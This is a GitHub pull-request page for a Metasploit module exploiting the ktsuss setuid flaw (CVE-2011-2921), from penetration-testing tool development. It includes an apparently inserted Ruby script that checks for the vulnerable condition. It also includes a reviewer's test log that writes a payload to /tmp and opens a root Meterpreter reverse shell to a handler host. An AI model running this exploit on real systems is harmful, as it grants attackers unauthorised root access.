
Add ktsuss suid Privilege Escalation module (CVE-2011-2921) #12212

Merged
merged 2 commits into from Sep 2, 2019

Conversation

@bcoles
Contributor

commented Aug 19, 2019

Add ktsuss suid Privilege Escalation module (CVE-2011-2921)

Still relevant in 2019

    This module attempts to gain root privileges by exploiting a
    vulnerability in ktsuss versions 1.4 and prior.

    The `ktsuss` executable is setuid `root` and does not drop
    privileges prior to executing user specified commands,
    resulting in command execution with `root` privileges.

    This module has been tested successfully on:

    ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and
    ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).
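The check the module performs, as seen in the thread below, is simple: confirm the `ktsuss` binary is setuid root, run `id` through it, and look for `euid=0` while the caller's `uid` is unprivileged. The following Ruby script is an added example that reproduces that logic; it is not the Metasploit module's code. It assumes ktsuss is installed at `/usr/bin/ktsuss` and, as the check output in the thread suggests, that `ktsuss id` executes `id` through ktsuss. The `id` output embedded in the comments is a constructed sample modelled on the output posted in the thread.

```ruby
#!/usr/bin/env ruby
# Added example: replicate the vulnerable-condition check for a setuid helper
# that does not drop privileges before executing a user-specified command.
# Not the Metasploit module's code; KTSUSS_PATH is an assumption.

require 'open3'

KTSUSS_PATH = '/usr/bin/ktsuss' # assumption: default install location

# True when a stat mode and owner uid describe a setuid-root file.
def setuid_root_mode?(mode, owner_uid)
  (mode & 04000) != 0 && owner_uid == 0
end

# True when the file at path exists and is setuid root.
def setuid_root?(path)
  st = File.stat(path)
  setuid_root_mode?(st.mode, st.uid)
rescue Errno::ENOENT, Errno::EACCES
  false
end

# Parse id(1) output such as (constructed sample, modelled on the thread):
#   uid=1000(sparky) gid=1001(sparky) euid=0(root) groups=1001(sparky),27(sudo)
# into a hash of the numeric uid/gid/euid/egid fields that are present.
# The word boundary keeps "uid=" from matching inside "euid=" and
# "gid=" from matching inside "egid=".
def parse_id(output)
  fields = {}
  output.scan(/\b(uid|gid|euid|egid)=(\d+)/) { |k, v| fields[k.to_sym] = v.to_i }
  fields
end

# The vulnerable condition: the command run through the helper reports
# euid 0 although the invoking user's uid is not 0.
def privilege_leak?(id_output)
  f = parse_id(id_output)
  return false unless f.key?(:uid) && f.key?(:euid)
  f[:uid] != 0 && f[:euid] == 0
end

# Returns :not_setuid, :unknown, :safe or :vulnerable.
# Only runs the harmless `id` command; no payload is executed.
def check(path = KTSUSS_PATH)
  return :not_setuid unless setuid_root?(path)
  out, _err, status = Open3.capture3(path, 'id')
  return :unknown unless status.success?
  privilege_leak?(out) ? :vulnerable : :safe
end

if __FILE__ == $PROGRAM_NAME
  puts "#{KTSUSS_PATH}: #{check}"
end
```

Run it as an unprivileged user on the target; `:vulnerable` means any command passed to ktsuss runs with an effective uid of 0. The fix class for this bug is the usual one for setuid helpers: drop to the invoking user's real ids (setresgid/setresuid, checked for success) before the exec, or avoid the setuid bit entirely and let a privileged helper authenticate the request.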
@bcoles

Contributor Author

commented Aug 31, 2019

Bump. Should be an easy merge.

@h00die h00die self-assigned this Sep 2, 2019

@h00die

Contributor

commented Sep 2, 2019

Downloading Sparky now. May not get to it till tomorrow though.

@h00die

Contributor

commented Sep 2, 2019

Working for me:

[*] Meterpreter session 1 opened (111.111.1.111:4444 -> 222.222.2.222:56788) at 2019-09-02 13:25:07 -0400

meterpreter > sysinfo
Computer     : 222.222.2.222
OS           : Sparky 5.8 (Linux 4.19.0-5-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=1000, gid=1001, euid=1000, egid=1001
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/linux/local/ktsuss_suid_priv_esc 
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check

[+] /usr/bin/ktsuss is setuid
[*] uid=1000(sparky) gid=1001(sparky) euid=0(root) groups=1001(sparky),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),104(scanner),107(lpadmin),113(netdev),114(bluetooth),1000(autologin)
[+] The target is vulnerable.
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run

[*] Started reverse TCP handler on 111.111.1.111:4444 
[+] /usr/bin/ktsuss is setuid
[*] uid=1000(sparky) gid=1001(sparky) euid=0(root) groups=1001(sparky),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),104(scanner),107(lpadmin),113(netdev),114(bluetooth),1000(autologin)
[*] Writing '/tmp/.qrUo7wJrpWx7fqQ' (323 bytes) ...
[*] Executing payload ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 222.222.2.222

[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:56790) at 2019-09-02 13:26:00 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

I'll go ahead and fix those two little things while I merge now.

h00die added a commit that referenced this pull request Sep 2, 2019

@h00die h00die merged commit 9ce3365 into rapid7:master Sep 2, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed.
@h00die

Contributor

commented Sep 2, 2019

Release Notes

This PR adds a Linux local privilege escalation exploit for ktsuss from 2011, which can still be used on modern Sparky Linux distributions.

@bcoles bcoles deleted the bcoles:ktsuss_suid_priv_esc branch Sep 2, 2019
